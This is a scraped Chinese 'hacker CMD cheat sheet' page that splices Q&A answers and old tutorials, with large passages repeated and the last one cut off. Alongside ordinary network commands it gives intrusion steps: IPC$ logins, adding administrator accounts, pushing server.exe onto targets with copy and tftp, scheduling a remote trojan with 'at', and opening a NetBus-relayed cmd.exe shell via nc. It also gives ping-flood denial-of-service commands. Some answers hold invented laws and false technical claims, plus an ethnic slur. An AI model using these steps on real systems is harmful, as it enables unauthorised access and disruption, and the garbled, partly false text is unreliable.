黑客cmd命令大全(黑客cmd命令大全速查手册)
最后更新:2024-02-23 08:38:00 手机定位技术交流文章
当黑客要懂得哪些主要的CMD命令?
net use ipipc$ " " /user:" " 建立IPC空链接 net use ipipc$ "密码" /user:"用户名" 建立IPC非空链接net use h: ipc$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H:net use h: ipc$ 登陆后映射对方C:到本地为H:net use ipipc$ /del 删除IPC链接net use h: /del 删除映射对方到本地的为H:的映射net user 用户名 密码 /add 建立用户net user guest /active:yes 激活guest用户net user 查看有哪些用户net user 帐户名 查看帐户的属性net localgroup ***istrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意:***istrator后加s用复数net start 查看开启了哪些服务net start 服务名 开启服务;(如:net start telnet, net start schedule)net stop 服务名 停止某服务net time 目标ip 查看对方时间net time 目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息net view 查看本地局域网内开启了哪些共享net view ip 查看对方局域网内开启了哪些共享net config 显示系统网络设置net logoff 断开连接的共享net pause 服务名 暂停某服务net send ip "文本信息" 向对方发信息net ver 局域网内正在使用的网络连接类型和信息net share 查看本地开启的共享net share ipc$ 开启ipcnet share ipc$ /del 删除ipcnet share c$ /del 删除C:共享net user guest 12345 用guest用户登陆后用将密码改为12345net password 密码 更改系统登陆密码netstat -a 查看开启了哪些端口,常用netstat -annetstat -n 查看端口的网络连接情况,常用netstat -annetstat -v 查看正在进行的工作netstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况)netstat -s 查看正在使用的所有协议使用情况nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写tracert -参数 ip(或计算机名) 跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。ping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参数“/all”显示全部配置信息tlist -t 以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)kill -F 进程名加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)del -F 文件名加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件,“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件move 盘符路径要移动的文件名存放移动文件的路径移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖fc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中,"> "和"> >" 是重定向命令at id号 开启已注册的某个计划任务at /delete 停止所有计划任务,用参数/yes则不需要确认就直接停止at id号 /delete 停止某个已注册的计划任务at 查看所有的计划任务at ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机finger username @host 查看最近有哪些用户登陆telnet ip 端口远和登陆服务器,默认端口为23open ip 连接到IP(属telnet登陆后的命令)telnet 在本机上直接键入telnet 将进入本机的telnetcopy 路径文件名1 路径文件名2 /y 复制文件1到指定的目录为文件2,用参数/y就同时取消确认你要改写一份现存目录文件copy c:srv.exe ip***$ 复制本地c:srv.exe到对方的***下cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件,注:2st.txt文件头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件copy ip***$svv.exe c: 或:copyip***$*.* 复制对方***i.exe文件(所有文件)至本地C:xcopy 要复制的文件或目录树 目标地址目录名复制文件和目录树,用参数/Y将不提示覆盖相同文件tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:server.exe登陆后,将“IP”的server.exe下载到目标主机c:server.exe 参数:-i指以二进制模式传送,如传送exe文件时用,如不加-i 则以ASCII模式(传送文本文件模式)进行传送tftp -i 对方IP put c:server.exe 登陆后,上传本地c:server.exe至主机ftp ip 端口用于上传文件至服务器或进行文件操作,默认端口为21。bin指用二进制方式传送(可执行文件进);默认为ASCII格式传送(文本文件时)route print 显示出IP路由,将主要显示网络地址Network addres,子网掩码Netmask,网关地址Gateway addres,接口地址Interfacearp 查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息arp -s ip 物理地址想ARP高速缓存中人工输入一个静态项目 ,该项目在计算机引导过程中将保持有效状态,或者出现错误的时候 人工配置的物理地址将更新本项目arp -d ip 本命令能人工栓除一个静态项目start 程序名或命令 /max 或/min 新开一个新窗口并最大化(最小化)运行某程序或命令mem 查看cpu使用情况attrib 文件名(目录名) 查看某文件(目录)的属性attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档,只读,系统,隐藏属性;用+则是添加为某属性dir 查看文件,参数:/Q显示文件及目录属系统哪个用户,/T:C显示文件创建时间,/T:A显示文件上次被访问时间,/T:W上次被修改时间date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间,而不必输入新日期和时间set 指定环境变量名称=要指派给变量的字符设置环境变量set 显示当前所有的环境变量 set p显示以P开头的环境变量
希望你 别走进误区,CMD 是系统管理的一个软件。在系统文件里自带,方便的操作和 更安全的 模式下工作 当然,会被人利用 来做些非法的勾当,不过 这些都违背本来这个软件的初衷。学知识不是害人的,你明白吗? 其实也没黑客,电脑95年才来到中国,当初叫WIN95, 开始 到如今 加起来有多少。不多年,相信以后系统的完善,会让这些所谓的黑客 无地自容。 他们通常是,用个软件扫描几个 系统补丁不完全的“肉鸡” 桥接上去以后,新建一个隐藏的管理员身份 窃取密码或者进行破坏。相信 一点,贼不可能永远当下去
希望你 别走进误区,CMD 是系统管理的一个软件。在系统文件里自带,方便的操作和 更安全的 模式下工作 当然,会被人利用 来做些非法的勾当,不过 这些都违背本来这个软件的初衷。学知识不是害人的,你明白吗? 其实也没黑客,电脑95年才来到中国,当初叫WIN95, 开始 到如今 加起来有多少。不多年,相信以后系统的完善,会让这些所谓的黑客 无地自容。 他们通常是,用个软件扫描几个 系统补丁不完全的“肉鸡” 桥接上去以后,新建一个隐藏的管理员身份 窃取密码或者进行破坏。相信 一点,贼不可能永远当下去
cmd攻击别人电脑命令,
无法攻击别人电脑,但是可以访问别人电脑。如下参考:1.在桌面上,单击“开始”,单击“运行”。2.输入输入CMDCMD并单击ok。3.或单击“开始”,并输入CMD。4.单击搜索CMD,然后您可以输入属。5.单击“计算机”,单击“磁盘C。6.搜索CMD.Exe,点击搜索软件,然后就可以进入别人的电脑内部,可以控制电脑了。
把你邮箱发给我,给你一个我用Python做的攻击器,只要知道对方IP,分分钟对方死机(原理:运用缓冲区溢出和网络堵塞以及网络欺骗原理,因为中国的防火墙对PING非常敏感,只要你使用此命令,并且重复向对方发送数据包,将会被中国网络安全联合部发现,根据中华人民共和国网络协议,将会犯罪。当然,我们精深的黑客当然会有一些办法躲避防火墙监视,先用PING进行网络堵塞攻击,我说了,中国防火墙对PING非常敏感,所以将会来监视,在这时,我们就用到了一个程序员都知道的原理:计算机只会听人指挥,不会有思维,你要他干什么,他就会干什么,你不让他停止,他就永远不会停止。所以,防火墙就会一直监视PING命令。这是,我们就运用缓冲区溢出原理,向对方不断发送PING,当然,既然防火墙都去监视之前的PING了,这个PING自然就会看轻。所以可以将数据包设置为1000-65500。这时候,网络欺骗将会生效,我用Python代码进行欺骗,欺骗对方IP,说“我”不是攻击者,xxx.xxx.xxx.xxx(任意IP)才是攻击者!这样,就会欺骗对方计算机。于是,就进行了很好的掩饰。就可以通过python程序的PING指令进行攻击了。对方严重的话20分钟卡死,重启其实就可以了,可能你会问我,为什么不让对方完蛋。例如黑客常用的“wnuke”“冰河”等,都会对对方进行严重的损失,违反了中华人民共和国网络协议,所以,让对方死机已经很可以了。如果你想要让局域网内的计算机断网的C++或Java代码,我可以给你用,但是,请不要违法!)攻击器样式如下(大概):-大概样式-
工欲善其事,必先利其器”——当然不是让你再满世界去找新的黑客软件啦(其实我不反对使用这些软件,相反我很喜欢用它们,但是必须是在知其所以然的情况下使用,才有可能对自身的电脑水平有所帮助),要进行入侵工作的话,至少(我认为)得装上NT操作系统,以它作为入侵平台,因为NT本身对网络的支持可以说比WIN9X来得更强大得多……当然,如果想对UNIX系统动点小手术(网络中的UNIX可始终还是主流呀)而又没钱装UNIX的话,LINUX也极佳的选择(特别是现在国内至少有七八种中文LINUX版本——想当年要给REDHAT配上中文支持是何等麻烦……),至少你可以借此了解UNIX系统的基本操作以及文件存放位置、系统配置、编译器、各种动作之后的记录等等…… 然后还得再学点编程语言,至少C与UNIX下的SHELL编程得会一点,能看懂人家写的利用各种漏洞的程序,能对它进行修改,偶尔还能写几个小程序放到网上让大伙儿乐乐,这样玩起来才可能有成就感(其实我自己还不太行,但这多少是个目标)好了,废话少说,先讲讲一些MS系统里自带的相关网络程序的使用吧。在MS的操作系统中,与网络安全较有关系的几个命令/程序是:pingwinipcfgtracertnetatnetstat,且待我慢慢道来:1. ping:这是TCP/IP协议中最有用的命令之一它给另一个系统发送一系列的数据包,该系统本身又发回一个响应,这条实用程序对查找远程主机很有用,它返回的结果表示是否能到达主机,宿主机发送一个返回数据包需要多长时间。Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS][-r count] [-s count] [[-j host-list] | [-k host-list]][-w timeout] destination-listOptions:-t Ping the specifed host until interrupted.(除非人为中止,否则一直ping下去)-a Resolve addresses to hostnames.(把IP转为主机名)-n count Number of echo requests to send.(响应请求的数量)-l size Send buffer size.(封包的大小)-f Set Don't Fragment flag in packet.(信息包中无碎片)-i TTL Time To Live.(时间)-v TOS Type Of Service.(服务类型)-r count Record route for count hops.-s count Timestamp for count hops.-j host-list Loose source route along host-list.-k host-list Strict source route along host-list.(较严格的……唉,怎么译好……算了,放着吧)-w timeout Timeout in milliseconds to wait for each reply.(timeout的时间)比如大家可能都知道的一个命令 # ping -f -s 65000 ***.***.***.***或者前阶段大家所谓ping死霉国佬时所用的命令(当然这样只会造成我方自己的网络阻塞)。其实这个命令主要是用来看对方应答的速度,如果怎么ping 得到的结果都是request time out。那恐怕你根本就不用你去找这台主机了,它不在你的射程之内。2. winipcfg:这是用来看自己IP位址的小工具,win98自带,NT里则网络监视器里就能看到IP了,还有个小实用程序叫……好象是叫IPCONFIG吧,没怎么用,都快忘了……这种东东网上其实相当之多,但既然“自带”,又何须外求,何况网上下载的黑客的东东里有没有特洛伊犹未可知,再说了,如果你不是在自己的“爱姬”上运行,岂不是就没法干活?——哈,不好意思,跑题了,但——接着跑两句:可以把一些常用的、经典的工具上传到网上,当作一个备份,什么时候在网吧、某家公司要干活的话,直接下载就是一个完整无缺的工具包了。这个东东相当简单,直接在DOS下键入命令就是了,没有什么参数。3. tracert:是验证通往远程主机路径的实用程序用法: tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name参数:-d Do not resolve addresses to hostnames.(不将IP转为主机名)-h maximum_hops Maximum number of hops to search for target.(最大跟踪数量)-j host-list Loose source route along host-list.-w timeout Wait timeout milliseconds for each reply.(time out 的时间)最简单的用法就是 tracert hostname 其中hostname是计算机名或你想跟踪其路径的计算机的IP地址。TRACERT将返回数据包借以到达最终目的地的各种IP地址,你知道该怎么利用它吗?我略为解释一下吧:跟踪通往210.142.192.130的路由,最大30:第一行:*&^%&* 我就是从这里出去的(呵,真不想说^&^)第四行:是不是快要出国了呢?第九行:呀!这是日本鬼子的地盘……4. net:这可是个非常棒的东西,如果不会用的话,赶紧睁大眼睛噢这个命令的语法是: 可用的命令包括:NET ACCOUNTS NET HELP NET SHARENET COMPUTER NET HELPMSG NET STARTNET CONFIG NET LOCALGROUP NET STATISTICSNET CONFIG SERVER NET NAME NET STOPNET CONFIG WORKSTATION NET PAUSE NET TIMENET CONTINUE NET PRINT NET USENET FILE NET SEND NET USERNET GROUP NET SESSION NET VIEWNET HELP SERVICES 列出用户可以启动的网络服务。NET HELP SYNTAX 解释如何阅读 NET HELP 语法行。NET HELP command | MORE 用于逐屏显示帮助。我可就不逐样解释了——这样会把我的手指累坏,就说说常用的两个命令吧a.net view这个命令的语法是:NET VIEW [\computername | /DOMAIN[:domainname]]NET VIEW /NETWORK:NW [\computername]NET VIEW 用于显示一个计算机上共享资源的列表。当不带选项使用本命令时,它就会显示当前域或网络上的计算机上的列表。\computername 指用户希望浏览其共享资源的计算机。/DOMAIN:domainname 指定用户希望浏览有效的计算机所在的域。如果省略了域名,就会显示局域网络上的所有域。/NETWORK:NW 显示 NetWare 网络上所有可用的服务器。如果指定了一个计算机名,就会显示NetWare 网络中那个计算机上的可用资源。至于举例嘛,比如你知道一个远程计算机***.***.**.***上有开资源共享,那么运行net view \***.***.**.*** 就可以了b.net use这个命令的语法是:NET USE [devicename | *] [\computernamesharename[volume] [password | *]][/USER:[domainname]username][[/DELETE] | [/PERSISTENT:{YES | NO}]]NET USE [devicename | *] [password | *]] [/HOME]NET USE [/PERSISTENT:{YES | NO}]NET USE 用于将计算机与共享的资源相连接,或者切断计算机与共享资源的连接。当不带选项使用本命令时,它会列出计算机的连接。devicename 指定一个名字以便与资源相连接,或者指定要切断的设备。有两种类型的设备名:磁盘驱动器 (D: 至 Z:) 和打印机 (LPT1: 至 LPT3:)。输入一个星号来代替一个指定的设备名可以分配下一个可用设备名。\computername 指控制共享资源的计算机的名字。如果计算机名中包含有空字符,就要将双反斜线 (\) 和计算机名一起用引号 (" ")括起来。计算机名可以有1 到15 个字符。sharename 指共享资源的网络名字。volume 指定一个服务器上的 NetWare 卷。用户必须安装 Netware 的客户服务(Windows NT 工作站) 或者 Netware 的网关服务 (Windows NT 服务器) 并使之与NetWare 服务器相连。password 指访问共享资源所需要的密码。* 进行密码提示。当在密码提示符下输入密码时,密码是不会显示的。/USER 指定连接时的一个不同的用户名。domainname 指定另外一个域。如果缺省域,就会使用当前登录的域。username 指定登录的用户名。/HOME 将用户与他们的宿主目录相连。/DELETE 取消一个网络连接,并且从永久连接列表中删除该连接。/PERSISTENT 控制对永久网络连接的使用。其缺省值是最近使用的设置。YES 在连接产生时保存它们,并在下次登录时恢复它们。NO 不保存正在产生的连接或后续的连接;现有的连接将在下次登录时被恢复。可以使用 /DELETE 选项开关来删除永久连接。PS:前两天在绿色兵团的贴子里见到一位仁兄的话,与这个命令有异曲共工之妙,也说明一个大概:在浏览器中输入 file:///\***.***.**.***c则网上共享的C盘内容就会显示出来了,就仿佛用浏览器上FTP站点看到的一样。各位不妨试试,还可试试举一反三……5.at: 排定在特定的日期和时间运行某些命令和程序。运行 AT 命令之前必须先启动 Schedule 服务。瞧,现炒就得现卖,刚学了net命令,但这个start命令我可没详述,自已看看帮助文件,摸索一下各种命令的用法吧。C:>net start scheduleSchedule 正在启动服务.....Schedulw 服务启动成功。AT [\computername] [ [id] [/DELETE] | /DELETE [/YES]]AT [\computername] time [/INTERACTIVE][ /EVERY:date[,...] | /NEXT:date[,...]] "command"\computername 指定远程计算机。如果省略这个参数命令会被排定在本机上运行。id 指定给排定进度命令的识别号。/delete 删除某个已排定进度的命令。如果省略标识,计算机上所有已排定进度的命令都会被删除。/yes 用于删除所有作业,且不想在运行删除时显示确认信息 。time 指定命令运行的时间。interactive 允许作业在运行时,与用户通过桌面交互。/every:date[,...] 指定在每周或每月的某日 (或某几日) 运行命令。如果省略日期,则默认为在每月的本日运行。/next:date[,...] 指定在下一个指定日期 (如,下周三),运行命令。如果省略日期,则默认为在每月的本日运行。"command" 准备运行的 Windows NT 命令或批处理文件。知道了如何使用AT,再来看看如何在远程NT上运行ntsrv.exe:1 利用管理员登陆到目的服务器,方法为: net use \x.x.x.xipc$ "adminpwd" /user:"adminuser"2 利用ntsrv.exe启动远程: netsvc \x.x.x.x schedule /start3 利用AT.EXE在远程服务器设置程序定时运行,当然最快运行最理想,所以,你可以用letmein.exe得到服务器的时间,然后:at \x.x.x.x 00:00 ntsrv.exe /port:64321其中00:00要改为用letmein.exe得回来的具体时间+一点容量,等一会后,再在本地启动netbus.exe,键入目的服务器得ip地址或hostname,连接!比如第一种方法,你想要在目的服务器运行诸如病毒之类的东东,可以利用netbus得上传功能,将各种“大补丸”上传至目的服务器,再用netbus的"Start program",键入完整路径,就ok了!第二种方法是利用netbus的“App redirect”功能,启动远程telnet服务,如下:在netbus中击“App redirect”,键入"C:>winntsystem32cmd.exe",Port为:4321,服务就启动了,然后在本地运行:nc x.x.x.x 4321,出现dos启动的画面就表示连接成功:Microsoft(R) Windows NT(TM)(C) Copyright 1985-1996 Microsoft Corp.C:>注:这里有一小段是抄KILLUSA的文章——别找我要稿费啊^&^4.netstat 这是一个观察网络连接状态的实用工具。它能检验IP的当前连接状态,在断定你的基本级通信正在进行后,就要验证系统上的服务。这个服务包括检查正在收听输入的通信量和/或验证你正在创建一个与远程站点的会话,它可以很轻松地做到这一点。网上也可以看到很多如X-netstat之类的工具,是WIN界面的,更加直观而已,并没有多什么功能,这个命令的具体用法如下:Displays protocol statistics and current TCP/IP network connections.(显示协议与当前网络连接)NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval]-a Displays all connections and listening ports.(显示所有连接和监听端口)-e Displays Ethernet statistics. This may be combined with the -soption.(显示以太连接,可以与-s连用)-n Displays addresses and port numbers in numerical form.(显示地址和端口)-p proto Shows connections for the protocol specified by proto; protomay be TCP or UDP. If used with the -s option to displayper-protocol statistics, proto may be TCP, UDP, or IP.-r Displays the routing table.-s Displays per-protocol statistics. By default, statistics areshown for TCP, UDP and IP; the -p option may be used to specifya subset of the default.interval Redisplays selected statistics, pausing interval secondsbetween each display. Press CTRL+C to stop redisplayingstatistics. If omitted, netstat will print the currentconfiguration information once.(interval是设定一个刷新时间,在间隔时间内暂停,按CTRL+C停止……) 这是我在本机未连接网络时运行的,第一列为协议,第二列为本地地址,第三列是与你进行连接的主机或用户的IP位址(IP后冒号之后的数字是端口号),最后一列是状态。这个命令以-n和-a的参数我较常使用,读者可以参考使用。
ping命令详解 对于Windows下ping命令相信大家已经再熟悉不过了,但是能把ping的功能发挥到最大的人却并不是很多,当然我也并不是说我可以让ping发挥最大的功能,我也只不过经常用ping这个工具,也总结了一些小经验,现在和大家分享一下。现在我就参照ping命令的帮助说明来给大家说说我使用ping时会用到的技巧,ping只有在安装了TCP/IP协议以后才可以使用:ping [-t] [-a] [-n count] [-l length] [-f] [-i ttl] [-v tos] [-r count] [-s count] [[-j computer-list] | [-k computer-list]] [-wz timeout] destination-listOptions:-t Ping the specified host until stopped.To see statistics and continue - type Control-Break;To stop - type Control-C.不停的ping地方主机,直到你按下Control-C。此功能没有什么特别的技巧,不过可以配合其他参数使用,将在下面提到。-a Resolve addresses to hostnames.解析计算机NetBios名。示例:C:\>ping -a 192.168.1.21Pinging iceblood.yofor.com [192.168.1.21] with 32 bytes of data:Reply from 192.168.1.21: bytes=32 time<10ms TTL=254Reply from 192.168.1.21: bytes=32 time<10ms TTL=254Reply from 192.168.1.21: bytes=32 time<10ms TTL=254Reply from 192.168.1.21: bytes=32 time<10ms TTL=254Ping statistics for 192.168.1.21:Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),Approximate round trip times in milli-seconds:Minimum = 0ms, Maximum = 0ms, Average = 0ms从上面就可以知道IP为192.168.1.21的计算机NetBios名为iceblood.yofor.com。-n count Number of echo requests to send.发送count指定的Echo数据包数。在默认情况下,一般都只发送四个数据包,通过这个命令可以自己定义发送的个数,对衡量网络速度很有帮助,比如我想测试发送50个数据包的返回的平均时间为多少,最快时间为多少,最慢时间为多少就可以通过以下获知:C:\>ping -n 50 202.103.96.68Pinging 202.103.96.68 with 32 bytes of data:Reply from 202.103.96.68: bytes=32 time=50ms TTL=241Reply from 202.103.96.68: bytes=32 time=50ms TTL=241Reply from 202.103.96.68: bytes=32 time=50ms TTL=241Request timed out.………………Reply from 202.103.96.68: bytes=32 time=50ms TTL=241Reply from 202.103.96.68: bytes=32 time=50ms TTL=241Ping statistics for 202.103.96.68:Packets: Sent = 50, Received = 48, Lost = 2 (4% loss),Approximate round trip times in milli-seconds:Minimum = 40ms, Maximum = 51ms, Average = 46ms从以上我就可以知道在给202.103.96.68发送50个数据包的过程当中,返回了48个,其中有两个由于未知原因丢失,这48个数据包当中返回速度最快为40ms,最慢为51ms,平均速度为46ms。-l size Send buffer size.定义echo数据包大小。在默认的情况下windows的ping发送的数据包大小为32byt,我们也可以自己定义它的大小,但有一个大小的限制,就是最大只能发送65500byt,也许有人会问为什么要限制到65500byt,因为Windows系列的系统都有一个安全漏洞(也许还包括其他系统)就是当向对方一次发送的数据包大于或等于65532时,对方就很有可能挡机,所以微软公司为了解决这一安全漏洞于是限制了ping的数据包大小。虽然微软公司已经做了此限制,但这个参数配合其他参数以后危害依然非常强大,比如我们就可以通过配合-t参数来实现一个带有攻击性的命令:(以下介绍带有危险性,仅用于试验,请勿轻易施于别人机器上,否则后果自负)C:\>ping -l 65500 -t 192.168.1.21Pinging 192.168.1.21 with 65500 bytes of data:Reply from 192.168.1.21: bytes=65500 time<10ms TTL=254Reply from 192.168.1.21: bytes=65500 time<10ms TTL=254………………这样它就会不停的向192.168.1.21计算机发送大小为65500byt的数据包,如果你只有一台计算机也许没有什么效果,但如果有很多计算机那么就可以使对方完全瘫痪,我曾经就做过这样的试验,当我同时使用10台以上计算机ping一台Win2000Pro系统的计算机时,不到5分钟对方的网络就已经完全瘫痪,网络严重堵塞,HTTP和FTP服务完全停止,由此可见威力非同小可。-f Set Don't Fragment flag in packet.在数据包中发送“不要分段”标志。在一般你所发送的数据包都会通过路由分段再发送给对方,加上此参数以后路由就不会再分段处理。-i TTL Time To Live.指定TTL值在对方的系统里停留的时间。此参数同样是帮助你检查网络运转情况的。-v TOS Type Of Service.将“服务类型”字段设置为 tos 指定的值。-r count Record route for count hops.在“记录路由”字段中记录传出和返回数据包的路由。在一般情况下你发送的数据包是通过一个个路由才到达对方的,但到底是经过了哪些路由呢?通过此参数就可以设定你想探测经过的路由的个数,不过限制在了9个,也就是说你只能跟踪到9个路由,如果想探测更多,可以通过其他命令实现,我将在以后的文章中给大家讲解。以下为示例:C:\>ping -n 1 -r 9 202.96.105.101 (发送一个数据包,最多记录9个路由)Pinging 202.96.105.101 with 32 bytes of data:Reply from 202.96.105.101: bytes=32 time=10ms TTL=249Route: 202.107.208.187 ->202.107.210.214 ->61.153.112.70 ->61.153.112.89 ->202.96.105.149 ->202.96.105.97 ->202.96.105.101 ->202.96.105.150 ->61.153.112.90Ping statistics for 202.96.105.101:Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),Approximate round trip times in milli-seconds:Minimum = 10ms, Maximum = 10ms, Average = 10ms从上面我就可以知道从我的计算机到202.96.105.101一共通过了202.107.208.187 ,202.107.210.214 , 61.153.112.70 , 61.153.112.89 , 202.96.105.149 , 202.96.105.97这几个路由。-s count Timestamp for count hops.指定 count 指定的跃点数的时间戳。此参数和-r差不多,只是这个参数不记录数据包返回所经过的路由,最多也只记录4个。-j host-list Loose source route along host-list.利用 computer-list 指定的计算机列表路由数据包。连续计算机可以被中间网关分隔(路由稀疏源)IP 允许的最大数量为 9。-k host-list Strict source route along host-list.利用 computer-list 指定的计算机列表路由数据包。连续计算机不能被中间网关分隔(路由严格源)IP 允许的最大数量为 9。-w timeout Timeout in milliseconds to wait for each reply.指定超时间隔,单位为毫秒。此参数没有什么其他技巧。ping命令的其他技巧:在一般情况下还可以通过ping对方让对方返回给你的TTL值大小,粗略的判断目标主机的系统类型是Windows系列还是UNIX/Linux系列,一般情况下Windows系列的系统返回的TTL值在100-130之间,而UNIX/Linux系列的系统返回的TTL值在240-255之间,当然TTL的值在对方的主机里是可以修改的,Windows系列的系统可以通过修改注册表以下键值实现:[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters]"DefaultTTL"=dword:000000ff255---FF128---8064----4032----20 好了,ping命令也基本上完全讲解完了
1.新建文档 输入 :startstart cmdgoto start后缀名改为bat远程连接127.0.0.1 (任意ip)将文件放在他的电脑里或输入shutdown -s -r我只是个孩子 只懂这点shutdown -s -t 60 表示一分钟后关机 taskkill -f -im cmd.exe表示关闭cmd
把你邮箱发给我,给你一个我用Python做的攻击器,只要知道对方IP,分分钟对方死机(原理:运用缓冲区溢出和网络堵塞以及网络欺骗原理,因为中国的防火墙对PING非常敏感,只要你使用此命令,并且重复向对方发送数据包,将会被中国网络安全联合部发现,根据中华人民共和国网络协议,将会犯罪。当然,我们精深的黑客当然会有一些办法躲避防火墙监视,先用PING进行网络堵塞攻击,我说了,中国防火墙对PING非常敏感,所以将会来监视,在这时,我们就用到了一个程序员都知道的原理:计算机只会听人指挥,不会有思维,你要他干什么,他就会干什么,你不让他停止,他就永远不会停止。所以,防火墙就会一直监视PING命令。这是,我们就运用缓冲区溢出原理,向对方不断发送PING,当然,既然防火墙都去监视之前的PING了,这个PING自然就会看轻。所以可以将数据包设置为1000-65500。这时候,网络欺骗将会生效,我用Python代码进行欺骗,欺骗对方IP,说“我”不是攻击者,xxx.xxx.xxx.xxx(任意IP)才是攻击者!这样,就会欺骗对方计算机。于是,就进行了很好的掩饰。就可以通过python程序的PING指令进行攻击了。对方严重的话20分钟卡死,重启其实就可以了,可能你会问我,为什么不让对方完蛋。例如黑客常用的“wnuke”“冰河”等,都会对对方进行严重的损失,违反了中华人民共和国网络协议,所以,让对方死机已经很可以了。如果你想要让局域网内的计算机断网的C++或Java代码,我可以给你用,但是,请不要违法!)攻击器样式如下(大概):-大概样式-
工欲善其事,必先利其器”——当然不是让你再满世界去找新的黑客软件啦(其实我不反对使用这些软件,相反我很喜欢用它们,但是必须是在知其所以然的情况下使用,才有可能对自身的电脑水平有所帮助),要进行入侵工作的话,至少(我认为)得装上NT操作系统,以它作为入侵平台,因为NT本身对网络的支持可以说比WIN9X来得更强大得多……当然,如果想对UNIX系统动点小手术(网络中的UNIX可始终还是主流呀)而又没钱装UNIX的话,LINUX也极佳的选择(特别是现在国内至少有七八种中文LINUX版本——想当年要给REDHAT配上中文支持是何等麻烦……),至少你可以借此了解UNIX系统的基本操作以及文件存放位置、系统配置、编译器、各种动作之后的记录等等…… 然后还得再学点编程语言,至少C与UNIX下的SHELL编程得会一点,能看懂人家写的利用各种漏洞的程序,能对它进行修改,偶尔还能写几个小程序放到网上让大伙儿乐乐,这样玩起来才可能有成就感(其实我自己还不太行,但这多少是个目标)好了,废话少说,先讲讲一些MS系统里自带的相关网络程序的使用吧。在MS的操作系统中,与网络安全较有关系的几个命令/程序是:pingwinipcfgtracertnetatnetstat,且待我慢慢道来:1. ping:这是TCP/IP协议中最有用的命令之一它给另一个系统发送一系列的数据包,该系统本身又发回一个响应,这条实用程序对查找远程主机很有用,它返回的结果表示是否能到达主机,宿主机发送一个返回数据包需要多长时间。Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS][-r count] [-s count] [[-j host-list] | [-k host-list]][-w timeout] destination-listOptions:-t Ping the specifed host until interrupted.(除非人为中止,否则一直ping下去)-a Resolve addresses to hostnames.(把IP转为主机名)-n count Number of echo requests to send.(响应请求的数量)-l size Send buffer size.(封包的大小)-f Set Don't Fragment flag in packet.(信息包中无碎片)-i TTL Time To Live.(时间)-v TOS Type Of Service.(服务类型)-r count Record route for count hops.-s count Timestamp for count hops.-j host-list Loose source route along host-list.-k host-list Strict source route along host-list.(较严格的……唉,怎么译好……算了,放着吧)-w timeout Timeout in milliseconds to wait for each reply.(timeout的时间)比如大家可能都知道的一个命令 # ping -f -s 65000 ***.***.***.***或者前阶段大家所谓ping死霉国佬时所用的命令(当然这样只会造成我方自己的网络阻塞)。其实这个命令主要是用来看对方应答的速度,如果怎么ping 得到的结果都是request time out。那恐怕你根本就不用你去找这台主机了,它不在你的射程之内。2. winipcfg:这是用来看自己IP位址的小工具,win98自带,NT里则网络监视器里就能看到IP了,还有个小实用程序叫……好象是叫IPCONFIG吧,没怎么用,都快忘了……这种东东网上其实相当之多,但既然“自带”,又何须外求,何况网上下载的黑客的东东里有没有特洛伊犹未可知,再说了,如果你不是在自己的“爱姬”上运行,岂不是就没法干活?——哈,不好意思,跑题了,但——接着跑两句:可以把一些常用的、经典的工具上传到网上,当作一个备份,什么时候在网吧、某家公司要干活的话,直接下载就是一个完整无缺的工具包了。这个东东相当简单,直接在DOS下键入命令就是了,没有什么参数。3. tracert:是验证通往远程主机路径的实用程序用法: tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name参数:-d Do not resolve addresses to hostnames.(不将IP转为主机名)-h maximum_hops Maximum number of hops to search for target.(最大跟踪数量)-j host-list Loose source route along host-list.-w timeout Wait timeout milliseconds for each reply.(time out 的时间)最简单的用法就是 tracert hostname 其中hostname是计算机名或你想跟踪其路径的计算机的IP地址。TRACERT将返回数据包借以到达最终目的地的各种IP地址,你知道该怎么利用它吗?我略为解释一下吧:跟踪通往210.142.192.130的路由,最大30:第一行:*&^%&* 我就是从这里出去的(呵,真不想说^&^)第四行:是不是快要出国了呢?第九行:呀!这是日本鬼子的地盘……4. net:这可是个非常棒的东西,如果不会用的话,赶紧睁大眼睛噢这个命令的语法是: 可用的命令包括:NET ACCOUNTS NET HELP NET SHARENET COMPUTER NET HELPMSG NET STARTNET CONFIG NET LOCALGROUP NET STATISTICSNET CONFIG SERVER NET NAME NET STOPNET CONFIG WORKSTATION NET PAUSE NET TIMENET CONTINUE NET PRINT NET USENET FILE NET SEND 